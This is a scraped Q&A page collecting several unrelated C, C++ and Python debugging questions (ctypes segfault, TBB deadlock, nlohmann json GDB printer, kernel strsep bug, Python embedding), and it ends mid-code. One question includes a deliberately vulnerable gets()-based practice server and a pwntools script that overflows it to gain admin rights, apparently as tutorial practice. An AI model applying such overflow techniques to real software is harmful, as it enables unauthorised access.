fgetc causes a segfault after running the second time

fgetc causes a segfault after running the second time - python

I have an application that tries to read a specific key file and this can happen multiple times during the program's lifespan. Here is the function for reading the file:
__status
_read_key_file(const char * file, char ** buffer)
{
FILE * pFile = NULL;
long fsize = 0;
pFile = fopen(file, "rb");
if (pFile == NULL) {
_set_error("Could not open file: ", 1);
return _ERROR;
}
// Get the filesize
while(fgetc(pFile) != EOF) {
++fsize;
}
*buffer = (char *) malloc(sizeof(char) * (fsize + 1));
// Read the file and write it to the buffer
rewind(pFile);
size_t result = fread(*buffer, sizeof(char), fsize, pFile);
if (result != fsize) {
_set_error("Reading error", 0);
fclose(pFile);
return _ERROR;
}
fclose(pFile);
pFile = NULL;
return _OK;
}
Now the problem is that for a single open/read/close it works just fine, except when I run the function the second time - it will always segfault at this line: while(fgetc(pFile) != EOF)
Tracing with gdb, it shows that the segfault occurs deeper within the fgetc function itself.
I am a bit lost, but obviously am doing something wrong, since if I try to tell the size with fseek/ftell, I always get a 0.
Some context:
Language: C
System: Linux (Ubuntu 16 64bit)
Please ignore functions
and names with underscores as they are defined somewhere else in the
code.
Program is designed to run as a dynamic library to load in Python via ctypes
EDIT
Right, it seems there's more than meets the eye. Jean-François Fabre spawned an idea that I tested and it worked, however I am still confused to why.
Some additional context:
Suppose there's a function in C that looks something like this:
_status
init(_conn_params cp) {
_status status = _NONE;
if (!cp.pkey_data) {
_set_error("No data, open the file", 0);
if(!cp.pkey_file) {
_set_error("No public key set", 0);
return _ERROR;
}
status = _read_key_file(cp.pkey_file, &cp.pkey_data);
if (status != _OK) return status;
}
/* SOME ADDITIONAL WORK AND CHECKING DONE HERE */
return status;
}
Now in Python (using 3.5 for testing), we generate those conn_params and then call the init function:
from ctypes import *
libCtest = CDLL('./lib/lib.so')
class _conn_params(Structure):
_fields_ = [
# Some params
('pkey_file', c_char_p),
('pkey_data', c_char_p),
# Some additonal params
]
#################### PART START #################
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
status = libCtest.init(cp) # Will cause a segfault
##################### PART END ###################
# However if we do
#################### PART START #################
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
# And then
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
##################### PART END ###################
The second PART START / PART END will not cause the segfault in this context.
Would anyone know a reason to why?

Related

GDB failing with Pwntools on log: (gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

Bottom line up front, my problem:
Rather, I would expect gdb to be stopped at a SIGINT instead of what is happening. I believe the SIGINT is triggered or at least gets has been called, because I don't seem to get this error until I reach that part of the code.
I've looked around for solutions, and already have tried:
sudo apt-get update --fix-missing
sudo apt-get source libc6
sudo apt-get install gdb-server
I am running on WSL / Kali
NAME="Kali GNU/Linux"
ID=kali
VERSION="2021.3"
VERSION_ID="2021.3"
VERSION_CODENAME="kali-rolling"
I'm roughly following a tutorial (although with a different target ELF) on exploiting a buffer overflow where source code is using gets.
I'm not asking for help with the exploitation, but rather with solving a problem automating Gdb through Pwntools.
The Rapid7 tutorial I'm following explains to use info frame, like:
(gdb) info frame
Stack level 0, frame at 0x7fffffffdde0:
rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x400701
called by frame at 0x7fffffffde30
source language c.
Arglist at 0x7fffffffddd0, args: sig=2
Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0
Saved registers:
rip at 0x7fffffffddd8
and then use the value of locals (0x7fffffffddd0 in the tutorial's case) with x/200x like:
x/200x 0x7fffffffddd0
...to inspect the relevant buffers.
The source for the program I'm exploiting is as follows. I add in raise(SIGINT); after the gets call to stop and inspect the stack. The python I wrote already exploits to reach that SIGINT.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
//gcc vuln.c -fno-stack-protector -no-pie -z execstack -o vuln
__attribute__((constructor)) void ignore_me(){
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
#define MAX_USERS 5
struct user {
char username[16];
char password[16];
};
void server() {
int choice;
char buf[0x10];
struct user User[MAX_USERS];
int num_users = 0;
int is_admin = 0;
char server_name[0x20] = "my_cool_server!";
while(1) {
puts("+=========:[ Menu ]:========+");
puts("| [1] Create Account |");
puts("| [2] View User List |");
puts("| [3] Change Server Name |");
puts("| [4] Log out |");
puts("+===========================+");
printf("\n > ");
if (fgets(buf, sizeof(buf), stdin) == NULL) {
exit(-1);
}
printf("is_admin: %d\n", is_admin);
printf("num_users: %d\n", num_users);
printf("buf size: %d\n", sizeof(buf));
choice = atoi(buf);
switch(choice) {
case 1:
if (num_users > 5)
puts("The server is at its user limit.");
else {
printf("Enter the username:\n > ");
fgets(User[num_users].username,15,stdin);
printf("Enter the password:\n > ");
fgets(User[num_users].password,15,stdin);
puts("User successfully created!\n");
num_users++;
}
break;
case 2:
if (num_users == 0)
puts("There are no users on this server yet.\n");
else {
for (int i = 0; i < num_users; i++) {
printf("%d: %s",i+1, User[i].username);
}
}
break;
case 3:
if (!is_admin) {
puts("You do not have administrative rights. Please refrain from such actions.\n");
break;
}
else {
printf("The server name is stored at %p\n",server_name);
printf("Enter new server name.\n > ");
gets(server_name);
raise(SIGINT);
break;
}
case 4:
puts("Goodbye!");
return;
}
}
}
void main() {
puts("Welcome to this awesome server!");
puts("I hired a professional to make sure its security is top notch.");
puts("Have fun!\n");
server();
}
My python (note that the gdb.execute() commands are what I'm trying to automate):
import os
os.system('clear')
def print_stdout(p):
out_list = p.read().decode("utf-8").split('\n')
#for out in out_list:
#print(out)
from pwn import *
#context.log_level = 'error'
p = gdb.debug("./vuln", api=True)
p.gdb.execute('continue')
print_stdout(p)
# enter Create Account menu 4 times (overflows do not occur until the 4th iteration)
for i in range(0,4):
# The first 14+ bytes don't seem to matter
free_padding = b'f' * 14
# The second 14 bytes seem to require 0's
# I wonder if this 14 + 1 number has something to do with the 15 bytes being read by username
num_padding = b'0' * 14
payload = free_padding + num_padding + b'1'
#print(f"Payload: {payload}")
# send buffer which will be interpreted as 1 by the menu selection logic
p.sendline(payload)
print_stdout(p)
# At 29 non-zero bytes an overflow into is_admin appears.
payload2 = b'1' * 29
p.sendline(payload2)
print_stdout(p)
# The password may have potential to be involved in the overflow, but isn't necessary.
payload3 = b'password'
p.sendline(payload3)
print_stdout(p)
#print('----------------')
# Since is_admin is no longer zero, we can enter the Change Server Name interface.
#gdb.attach(p)
p.sendline(b'3')
print_stdout(p)
p.sendline(cyclic(100, n=8))
# here we should get a breakpoint and use:
# p.gdb.execute('info frame')
# then parse the locals address, assign it to locals_addr and use:
# p.gdb.execute(f"x/200x {locals_addr}")
The error, as I stated in the comments, triggered when I try this (and it doesnt seem to trigger until the SIGINT is reached, hence my inclusion of all the code) is:
(gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

Deadlock when combining Python with TBB

Here I would like to offer a complete test case showing a simple TBB parallel_for construct causing deadlock in a Python application. Python frontend is combined with TBB backend using pybind11:
void backend_tbb(vector<int>& result, std::function<int (int)>& callback)
{
int nthreads = tbb::task_scheduler_init::default_num_threads();
const char* cnthreads = getenv("TBB_NUM_THREADS");
if (cnthreads) nthreads = std::max(1, atoi(cnthreads));
tbb::task_group group;
tbb::task_arena arena(nthreads, 1);
tbb::task_scheduler_init init(nthreads);
group.run( [&] {
tbb::parallel_for(tbb::blocked_range<int>(0, result.size()),
[&](const tbb::blocked_range<int>& range)
{
for (int i = range.begin(); i != range.end(); i++)
result[i] = callback(i);
});
});
arena.execute( [&] { group.wait(); });
}
void backend_serial(vector<int>& result, std::function<int (int)>& callback)
{
for (int i = 0; i < result.size(); i++)
result[i] = callback(i);
}
PYBIND11_MODULE(python_tbb, m)
{
pybind11::bind_vector<std::vector<int> >(m, "stdvectorint");
m.def("backend_tbb", &backend_tbb, "TBB backend");
m.def("backend_serial", &backend_serial, "Serial backend");
}
With backend_tbb uncommented, app deadlocks infinitely:
from python_tbb import *
import numpy as np
def callback(a) :
return int(a) * 10
def main() :
length = 10
result1 = stdvectorint(np.zeros(length, np.int32))
result2 = stdvectorint(np.zeros(length, np.int32))
backend_serial(result1, callback)
# XXX Uncomment this to get the program hang
#backend_tbb(result2, callback)
for i in range(length) :
print("%d vs %d" % (result1[i], result2[i]))
if __name__ == "__main__" :
main()
I've tried gil_scoped_acquire/gil_scoped_release, but no change. Similar solution reportedly works for OpenMP loop - but again no luck when I try to do the same for TBB. Please kindly advice on this case, thanks!

The issue is that TBB tasks get spawned inside task_arena instance associated with the task_group, but the waiting is done inside another task_arena instance, called arena. This can lead to the deadlock. To fix the issue, try wrapping the call to group.run() into task_arena.execute() similarly as it is done for group.wait().
However, in this case, the latter wrapping seems superfluous. So, you might want to combine two wrappings into one
arena.execute() {
group.run( /* ... */ );
group.wait();
}
which, in this particular example, makes the use of task_group unnecessary since the master thread spawns the tasks and immediately joins for participating in their execution, similarly as it is done in tbb::parallel_for. Thus, task_group can be merely removed.

C++ debug/print custom type with GDB : the case of nlohmann json library

I'm working on a project using nlohmann's json C++ implementation.
How can one easily explore nlohmann's JSON keys/vals in GDB ?
I tried to use this STL gdb wrapping since it provides helpers to explore standard C++ library structures that nlohmann's JSON lib is using.
But I don't find it convenient.
Here is a simple use case:
json foo;
foo["flex"] = 0.2;
foo["awesome_str"] = "bleh";
foo["nested"] = {{"bar", "barz"}};
What I would like to have in GDB:
(gdb) p foo
{
"flex" : 0.2,
"awesome_str": "bleh",
"nested": etc.
}
Current behavior
(gdb) p foo
$1 = {
m_type = nlohmann::detail::value_t::object,
m_value = {
object = 0x129ccdd0,
array = 0x129ccdd0,
string = 0x129ccdd0,
boolean = 208,
number_integer = 312266192,
number_unsigned = 312266192,
number_float = 1.5427999782486669e-315
}
}
(gdb) p foo.at("flex")
Cannot evaluate function -- may be inlined // I suppose it depends on my compilation process. But I guess it does not invalidate the question.
(gdb) p *foo.m_value.object
$2 = {
_M_t = {
_M_impl = {
<std::allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, nlohmann::basic_json<std::map, std::vector, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, bool, long long, unsigned long long, double, std::allocator, nlohmann::adl_serializer> > > >> = {
<__gnu_cxx::new_allocator<std::_Rb_tree_node<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, nlohmann::basic_json<std::map, std::vector, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, bool, long long, unsigned long long, double, std::allocator, nlohmann::adl_serializer> > > >> = {<No data fields>}, <No data fields>},
<std::_Rb_tree_key_compare<std::less<void> >> = {
_M_key_compare = {<No data fields>}
},
<std::_Rb_tree_header> = {
_M_header = {
_M_color = std::_S_red,
_M_parent = 0x4d72d0,
_M_left = 0x4d7210,
_M_right = 0x4d7270
},
_M_node_count = 5
}, <No data fields>}
}
}

I found my own answer reading further the GDB capabilities and stack overflow questions concerning print of std::string.
The short path is the easiest.
The other path was hard, but I'm glad I managed to do this. There is lots of room for improvements.
there is an open issue for this particular matter here https://github.com/nlohmann/json/issues/1952*
Short path v3.1.2
I simply defined a gdb command as follows:
# this is a gdb script
# can be loaded from gdb using
# source my_script.txt (or. gdb or whatever you like)
define pjson
# use the lohmann's builtin dump method, ident 4 and use space separator
printf "%s\n", $arg0.dump(4, ' ', true).c_str()
end
# configure command helper (text displayed when typing 'help pjson' in gdb)
document pjson
Prints a lohmann's JSON C++ variable as a human-readable JSON string
end
Using it in gdb:
(gdb) source my_custom_script.gdb
(gdb) pjson foo
{
"flex" : 0.2,
"awesome_str": "bleh",
"nested": {
"bar": "barz"
}
}
Short path v3.7.0 [EDIT] 2019-onv-06
One may also use the new to_string() method,but I could not get it to work withing GDB with a live inferior process. Method below still works.
# this is a gdb script
# can be loaded from gdb using
# source my_script.txt (or. gdb or whatever you like)
define pjson
# use the lohmann's builtin dump method, ident 4 and use space separator
printf "%s\n", $arg0.dump(4, ' ', true, json::error_handler_t::strict).c_str()
end
# configure command helper (text displayed when typing 'help pjson' in gdb)
document pjson
Prints a lohmann's JSON C++ variable as a human-readable JSON string
end
April 18th 2020: WORKING FULL PYTHON GDB (with live inferior process and debug symbols)
Edit 2020-april-26: the code (offsets) here are out of blue and NOT compatible for all platforms/JSON lib compilations. The github project is much more mature regarding this matter (3 platforms tested so far). Code is left there as is since I won't maintain 2 codebases.
versions:
https://github.com/nlohmann/json version 3.7.3
GNU gdb (GDB) 8.3 for GNAT Community 2019 [rev=gdb-8.3-ref-194-g3fc1095]
c++ project built with GPRBUILD/ GNAT Community 2019 (20190517) (x86_64-pc-mingw32)
The following python code shall be loaded within gdb. I use a .gdbinit file sourced in gdb.
Github repo: https://github.com/LoneWanderer-GH/nlohmann-json-gdb
GDB script
Feel free to adopt the loading method of your choice (auto, or not, or IDE plugin, whatever)
set print pretty
# source stl_parser.gdb # if you like the good work done with those STL containers GDB parsers
source printer.py # the python file is given below
python gdb.printing.register_pretty_printer(gdb.current_objfile(), build_pretty_printer())
Python script
import gdb
import platform
import sys
import traceback
# adapted from https://github.com/hugsy/gef/blob/dev/gef.py
# their rights are theirs
HORIZONTAL_LINE = "_" # u"\u2500"
LEFT_ARROW = "<-" # "\u2190 "
RIGHT_ARROW = "->" # " \u2192 "
DOWN_ARROW = "|" # "\u21b3"
nlohmann_json_type_namespace = \
r"nlohmann::basic_json<std::map, std::vector, std::__cxx11::basic_string<char, std::char_traits<char>, " \
r"std::allocator<char> >, bool, long long, unsigned long long, double, std::allocator, nlohmann::adl_serializer>"
# STD black magic
MAGIC_STD_VECTOR_OFFSET = 16 # win 10 x64 values, beware on your platform
MAGIC_OFFSET_STD_MAP = 32 # win 10 x64 values, beware on your platform
""""""
# GDB black magic
""""""
nlohmann_json_type = gdb.lookup_type(nlohmann_json_type_namespace).pointer()
# for in memory direct jumps. cast to type is still necessary yet to obtain values, but this could be changed by chaning the types to simpler ones ?
std_rb_tree_node_type = gdb.lookup_type("std::_Rb_tree_node_base::_Base_ptr").pointer()
std_rb_tree_size_type = gdb.lookup_type("std::size_t").pointer()
""""""
# nlohmann_json reminder. any interface change should be reflected here
# enum class value_t : std::uint8_t
# {
# null, ///< null value
# object, ///< object (unordered set of name/value pairs)
# array, ///< array (ordered collection of values)
# string, ///< string value
# boolean, ///< boolean value
# number_integer, ///< number value (signed integer)
# number_unsigned, ///< number value (unsigned integer)
# number_float, ///< number value (floating-point)
# discarded ///< discarded by the the parser callback function
# };
""""""
enum_literals_namespace = ["nlohmann::detail::value_t::null",
"nlohmann::detail::value_t::object",
"nlohmann::detail::value_t::array",
"nlohmann::detail::value_t::string",
"nlohmann::detail::value_t::boolean",
"nlohmann::detail::value_t::number_integer",
"nlohmann::detail::value_t::number_unsigned",
"nlohmann::detail::value_t::number_float",
"nlohmann::detail::value_t::discarded"]
enum_literal_namespace_to_literal = dict([(e, e.split("::")[-1]) for e in enum_literals_namespace])
INDENT = 4 # beautiful isn't it ?
def std_stl_item_to_int_address(node):
return int(str(node), 0)
def parse_std_str_from_hexa_address(hexa_str):
# https://stackoverflow.com/questions/6776961/how-to-inspect-stdstring-in-gdb-with-no-source-code
return '"{}"'.format(gdb.parse_and_eval("*(char**){}".format(hexa_str)).string())
class LohmannJSONPrinter(object):
"""Print a nlohmann::json in GDB python
BEWARE :
- Contains shitty string formatting (defining lists and playing with ",".join(...) could be better; ident management is stoneage style)
- Parsing barely tested only with a live inferior process.
- It could possibly work with a core dump + debug symbols. TODO: read that stuff
https://doc.ecoscentric.com/gnutools/doc/gdb/Core-File-Generation.html
- Not idea what happens with no symbols available, lots of fields are retrieved by name and should be changed to offsets if possible
- NO LIB VERSION MANAGEMENT. TODO: determine if there are serious variants in nlohmann data structures that would justify working with strucutres
- PLATFORM DEPENDANT TODO: remove the black magic offsets or handle them in a nicer way
NB: If you are python-kaizer-style-guru, please consider helping or teaching how to improve all that mess
"""
def __init__(self, val, indent_level=0):
self.val = val
self.field_type_full_namespace = None
self.field_type_short = None
self.indent_level = indent_level
self.function_map = {"nlohmann::detail::value_t::null": self.parse_as_leaf,
"nlohmann::detail::value_t::object": self.parse_as_object,
"nlohmann::detail::value_t::array": self.parse_as_array,
"nlohmann::detail::value_t::string": self.parse_as_str,
"nlohmann::detail::value_t::boolean": self.parse_as_leaf,
"nlohmann::detail::value_t::number_integer": self.parse_as_leaf,
"nlohmann::detail::value_t::number_unsigned": self.parse_as_leaf,
"nlohmann::detail::value_t::number_float": self.parse_as_leaf,
"nlohmann::detail::value_t::discarded": self.parse_as_leaf}
def parse_as_object(self):
assert (self.field_type_short == "object")
o = self.val["m_value"][self.field_type_short]
# traversing tree is a an adapted copy pasta from STL gdb parser
# (http://www.yolinux.com/TUTORIALS/src/dbinit_stl_views-1.03.txt and similar links)
# Simple GDB Macros writen by Dan Marinescu (H-PhD) - License GPL
# Inspired by intial work of Tom Malnar,
# Tony Novac (PhD) / Cornell / Stanford,
# Gilad Mishne (PhD) and Many Many Others.
# Contact: dan_c_marinescu#yahoo.com (Subject: STL)
#
# Modified to work with g++ 4.3 by Anders Elton
# Also added _member functions, that instead of printing the entire class in map, prints a member.
node = o["_M_t"]["_M_impl"]["_M_header"]["_M_left"]
# end = o["_M_t"]["_M_impl"]["_M_header"]
tree_size = o["_M_t"]["_M_impl"]["_M_node_count"]
# in memory alternatives:
_M_t = std_stl_item_to_int_address(o.referenced_value().address)
_M_t_M_impl_M_header_M_left = _M_t + 8 + 16 # adding bits
_M_t_M_impl_M_node_count = _M_t + 8 + 16 + 16 # adding bits
node = gdb.Value(long(_M_t_M_impl_M_header_M_left)).cast(std_rb_tree_node_type).referenced_value()
tree_size = gdb.Value(long(_M_t_M_impl_M_node_count)).cast(std_rb_tree_size_type).referenced_value()
i = 0
if tree_size == 0:
return "{}"
else:
s = "{\n"
self.indent_level += 1
while i < tree_size:
# STL GDB scripts write "+1" which in my w10 x64 GDB makes a +32 bits move ...
# may be platform dependant and should be taken with caution
key_address = std_stl_item_to_int_address(node) + MAGIC_OFFSET_STD_MAP
# print(key_object['_M_dataplus']['_M_p'])
k_str = parse_std_str_from_hexa_address(hex(key_address))
# offset = MAGIC_OFFSET_STD_MAP
value_address = key_address + MAGIC_OFFSET_STD_MAP
value_object = gdb.Value(long(value_address)).cast(nlohmann_json_type)
v_str = LohmannJSONPrinter(value_object, self.indent_level + 1).to_string()
k_v_str = "{} : {}".format(k_str, v_str)
end_of_line = "\n" if tree_size <= 1 or i == tree_size else ",\n"
s = s + (" " * (self.indent_level * INDENT)) + k_v_str + end_of_line # ",\n"
if std_stl_item_to_int_address(node["_M_right"]) != 0:
node = node["_M_right"]
while std_stl_item_to_int_address(node["_M_left"]) != 0:
node = node["_M_left"]
else:
tmp_node = node["_M_parent"]
while std_stl_item_to_int_address(node) == std_stl_item_to_int_address(tmp_node["_M_right"]):
node = tmp_node
tmp_node = tmp_node["_M_parent"]
if std_stl_item_to_int_address(node["_M_right"]) != std_stl_item_to_int_address(tmp_node):
node = tmp_node
i += 1
self.indent_level -= 2
s = s + (" " * (self.indent_level * INDENT)) + "}"
return s
def parse_as_str(self):
return parse_std_str_from_hexa_address(str(self.val["m_value"][self.field_type_short]))
def parse_as_leaf(self):
s = "WTFBBQ !"
if self.field_type_short == "null" or self.field_type_short == "discarded":
s = self.field_type_short
elif self.field_type_short == "string":
s = self.parse_as_str()
else:
s = str(self.val["m_value"][self.field_type_short])
return s
def parse_as_array(self):
assert (self.field_type_short == "array")
o = self.val["m_value"][self.field_type_short]
start = o["_M_impl"]["_M_start"]
size = o["_M_impl"]["_M_finish"] - start
# capacity = o["_M_impl"]["_M_end_of_storage"] - start
# size_max = size - 1
i = 0
start_address = std_stl_item_to_int_address(start)
if size == 0:
s = "[]"
else:
self.indent_level += 1
s = "[\n"
while i < size:
# STL GDB scripts write "+1" which in my w10 x64 GDB makes a +16 bits move ...
offset = i * MAGIC_STD_VECTOR_OFFSET
i_address = start_address + offset
value_object = gdb.Value(long(i_address)).cast(nlohmann_json_type)
v_str = LohmannJSONPrinter(value_object, self.indent_level + 1).to_string()
end_of_line = "\n" if size <= 1 or i == size else ",\n"
s = s + (" " * (self.indent_level * INDENT)) + v_str + end_of_line
i += 1
self.indent_level -= 2
s = s + (" " * (self.indent_level * INDENT)) + "]"
return s
def is_leaf(self):
return self.field_type_short != "object" and self.field_type_short != "array"
def parse_as_aggregate(self):
if self.field_type_short == "object":
s = self.parse_as_object()
elif self.field_type_short == "array":
s = self.parse_as_array()
else:
s = "WTFBBQ !"
return s
def parse(self):
# s = "WTFBBQ !"
if self.is_leaf():
s = self.parse_as_leaf()
else:
s = self.parse_as_aggregate()
return s
def to_string(self):
try:
self.field_type_full_namespace = self.val["m_type"]
str_val = str(self.field_type_full_namespace)
if not str_val in enum_literal_namespace_to_literal:
return "TIMMY !"
self.field_type_short = enum_literal_namespace_to_literal[str_val]
return self.function_map[str_val]()
# return self.parse()
except:
show_last_exception()
return "NOT A JSON OBJECT // CORRUPTED ?"
def display_hint(self):
return self.val.type
# adapted from https://github.com/hugsy/gef/blob/dev/gef.py
# inspired by https://stackoverflow.com/questions/44733195/gdb-python-api-getting-the-python-api-of-gdb-to-print-the-offending-line-numbe
def show_last_exception():
"""Display the last Python exception."""
print("")
exc_type, exc_value, exc_traceback = sys.exc_info()
print(" Exception raised ".center(80, HORIZONTAL_LINE))
print("{}: {}".format(exc_type.__name__, exc_value))
print(" Detailed stacktrace ".center(80, HORIZONTAL_LINE))
for (filename, lineno, method, code) in traceback.extract_tb(exc_traceback)[::-1]:
print("""{} File "{}", line {:d}, in {}()""".format(DOWN_ARROW, filename, lineno, method))
print(" {} {}".format(RIGHT_ARROW, code))
print(" Last 10 GDB commands ".center(80, HORIZONTAL_LINE))
gdb.execute("show commands")
print(" Runtime environment ".center(80, HORIZONTAL_LINE))
print("* GDB: {}".format(gdb.VERSION))
print("* Python: {:d}.{:d}.{:d} - {:s}".format(sys.version_info.major, sys.version_info.minor,
sys.version_info.micro, sys.version_info.releaselevel))
print("* OS: {:s} - {:s} ({:s}) on {:s}".format(platform.system(), platform.release(),
platform.architecture()[0],
" ".join(platform.dist())))
print(horizontal_line * 80)
print("")
exit(-6000)
def build_pretty_printer():
pp = gdb.printing.RegexpCollectionPrettyPrinter("nlohmann_json")
pp.add_printer(nlohmann_json_type_namespace, "^{}$".format(nlohmann_json_type_namespace), LohmannJSONPrinter)
return pp
######
# executed at autoload (or to be executed by in GDB)
# gdb.printing.register_pretty_printer(gdb.current_objfile(),build_pretty_printer())
BEWARE :
- Contains shitty string formatting (defining lists and playing with ",".join(...) could be better; ident management is stoneage style)
- Parsing barely tested only with a live inferior process.
- It could possibly work with a core dump + debug symbols. TODO: read that stuff
https://doc.ecoscentric.com/gnutools/doc/gdb/Core-File-Generation.html
- Not idea what happens with no symbols available, lots of fields are retrieved by name and should be changed to offsets if possible
- NO LIB VERSION MANAGEMENT. TODO: determine if there are serious variants in nlohmann data structures that would justify working with structures
- PLATFORM DEPENDANT TODO: remove the black magic offsets or handle them in a nicer way
NB: If you are python-kaizer-style-guru, please consider helping or teaching how to improve all that mess
some (light tests):
gpr file:
project Debug_Printer is
for Source_Dirs use ("src", "include");
for Object_Dir use "obj";
for Main use ("main.cpp");
for Languages use ("C++");
package Naming is
for Spec_Suffix ("c++") use ".hpp";
end Naming;
package Compiler is
for Switches ("c++") use ("-O3", "-Wall", "-Woverloaded-virtual", "-g");
end Compiler;
package Linker is
for Switches ("c++") use ("-g");
end Linker;
end Debug_Printer;
main.cpp
#include // i am using the standalone json.hpp from the repo release
#include
using json = nlohmann::json;
int main() {
json fooz;
fooz = 0.7;
json arr = {3, "25", 0.5};
json one;
one["first"] = "second";
json foo;
foo["flex"] = 0.2;
foo["bool"] = true;
foo["int"] = 5;
foo["float"] = 5.22;
foo["trap "] = "you fell";
foo["awesome_str"] = "bleh";
foo["nested"] = {{"bar", "barz"}};
foo["array"] = { 1, 0, 2 };
std::cout << "fooz" << std::endl;
std::cout << fooz.dump(4) << std::endl << std::endl;
std::cout << "arr" << std::endl;
std::cout << arr.dump(4) << std::endl << std::endl;
std::cout << "one" << std::endl;
std::cout << one.dump(4) << std::endl << std::endl;
std::cout << "foo" << std::endl;
std::cout << foo.dump(4) << std::endl << std::endl;
json mixed_nested;
mixed_nested["Jean"] = fooz;
mixed_nested["Baptiste"] = one;
mixed_nested["Emmanuel"] = arr;
mixed_nested["Zorg"] = foo;
std::cout << "5th element" << std::endl;
std::cout << mixed_nested.dump(4) << std::endl << std::endl;
return 0;
}
outputs:
(gdb) source .gdbinit
Breakpoint 1, main () at F:\DEV\Projets\nlohmann.json\src\main.cpp:45
(gdb) p mixed_nested
$1 = {
"Baptiste" : {
"first" : "second"
},
"Emmanuel" : [
3,
"25",
0.5,
],
"Jean" : 0.69999999999999996,
"Zorg" : {
"array" : [
1,
0,
2,
],
"awesome_str" : "bleh",
"bool" : true,
"flex" : 0.20000000000000001,
"float" : 5.2199999999999998,
"int" : 5,
"nested" : {
"bar" : "barz"
},
"trap " : "you fell",
},
}
Edit 2019-march-24 : add precision given by employed russian.
Edit 2020-april-18 : after a long night of struggling with python/gdb/stl I had something working by the ways of the GDB documentation for python pretty printers. Please forgive any mistakes or misconceptions, I banged my head a whole night on this and everything is flurry-blurry now.
Edit 2020-april-18 (2): rb tree node and tree_size could be traversed in a more "in-memory" way (see above)
Edit 2020-april-26: add warning concerning the GDB python pretty printer.

My solution was to edit the ~/.gdbinit file.
define jsontostring
printf "%s\n", $arg0.dump(2, ' ', true, nlohmann::detail::error_handler_t::strict).c_str()
end
This makes the "jsontostring" command available on every gdb session without the need of sourcing any files.
(gdb) jsontostring object

'strsep' causing Linux kernel freeze

I have a program in userspace that writes to a sysfs file in my kernel module.
I have isolated that with high probability the source of the crash is this specific function, as when I run the user code before reaching this point it doesn't crash, but when I add the write code it crashes with high probability.
I suspect the way I parse the string causes a memory error but I don't understand why.
I am working on kernel version 3.2 and python 2.7
By crash I mean the whole system freezes up and I have to either restart it or restore the VM to a previous snapshot.
user write code(python):
portFile = open(realDstPath, "w")
portFile.write(str(ipToint(srcIP)) + "|" + str(srcPort) + "|")
portFile.close()
kernel code:
ssize_t requestDstAddr( struct device *dev,
struct device_attribute *attr,
const char *buff,
size_t count)
{
char *token;
char *localBuff = kmalloc(sizeof(char) * count, GFP_ATOMIC);
long int temp;
if(localBuff == NULL)
{
printk(KERN_ERR "ERROR: kmalloc failed\n");
return -1;
}
memcpy(localBuff, buff, count);
spin_lock(&conntabLock);
//parse values passed from proxy
token = strsep(&localBuff, "|");
kstrtol(token, 10, &temp);
requestedSrcIP = htonl(temp);
token = strsep(&localBuff, "|");
kstrtol(token, 10, &temp);
requestedSrcPort = htons(temp);
spin_unlock(&conntabLock);
kfree(localBuff);
return count;
}

Look closely at strsep. From man strsep:
char *strsep(char **stringp, const char *delim);
... and *stringp is updated to point past the token. ...
In your code you do:
char *localBuff = kmalloc(sizeof(char) * count, GFP_ATOMIC)
...
token = strsep(&localBuff, "|");
...
kfree(localBuff);
The localBuff variable is updated after the strsep call. So the call to kfree is not with the same pointer. That allows for very strange behaviors. Use a temporary pointer to save the state of strsep function. And check it's return value.

Embedding python serial controller in C++

I've been searching around for several hours trying to get this code working and I just can't quite seem to get it.
I'm working on a function in C++ where I can call one of a number of python scripts, which have variable numbers of arguements. The Python works, but I keep getting segfaults in my C++.
double run_python(motor_command command){
//A routine that will run a python function that is in the same directory.
Py_Initialize();
PySys_SetPath(".");
string pyName; //Declaration of the string and int
int speed;
if (command.action == READ){
pyName = "read_encoders"; //Name of one python module
}else{
pyName = "drive_motor"; //Name of the other python module
speed = command.speed; //struct
}
int board_address = command.board_address;
int motor = command.motor_num;
//PyObject* moduleName = PyString_FromString(pyName.c_str());
// Py_INCREF(myModule);
//PyObject* myFunction = PyObject_GetAttrString(myModule, "run"); //Both of these python functions have subroutine 'run'
PyObject* args;
if(command.action == READ){
args = PyTuple_Pack(2,PyInt_FromLong(board_address),PyInt_FromLong(motor)); //Appropriate args for the read_encoders
}else{
args = PyTuple_Pack(3,PyInt_FromLong(board_address),PyInt_FromLong(motor), PyInt_FromLong(speed)); //Appropriate args for the drive_motor
}
Py_INCREF(args);
cout << "I got here" << endl;
PyObject* myModule = PyImport_Import((char*)pyName.c_str());//Python interface
cout << "args = " << args << " modlue = " << myModule << endl;
//Py_INCREF(myModule);
PyObject* myResult = PyObject_CallObject(myModule, args); //Run it and store the result in myResult
Py_INCREF(myResult);
double result = PyFloat_AsDouble(myResult);
Py_DECREF(myResult);
return result;
}
So far, what I can figure out is that somehow my myModule is not geting imported correctly and is returning a NULL value. As a result, when I attempt the _CallObject, it throws a segfault and I'm up a creek. When I uncommend the Py_INCREF for myModule, it throws a segfault there, and so I guess taht I'm not importing my python code correctly.
Oh, useful information: OS: Angstorm Linux, on a MinnowBoard (x86 architecture).
General structure of the python program:
import sys
import serial
board_num = sys.argv[1]
motor = sys.argv[2]
speed = sys.argv[3]
def run(board_num, motor, speed):
# Command arguments: Board number (0x80, 0x81...), motor number (0 or 1) and speed(2's complement signed integer)
ser = serial.Serial('/dev/ttyPCH1', 38400)
motor_min = 0
motor_max = 1 # These are the two acceptable values for motor enumerated values.
e_code = -1 # Error code
try:
board_num = int(board_num, 0)
except:
print "Invalid address format: Must be a number"
exit(e_code)
try:
motor = int(motor, 0)
except:
print "Motor must be either motor 0 or 1. Or possibly one or two..."
exit(e_code)
try:
speed = int(speed, 0)
except:
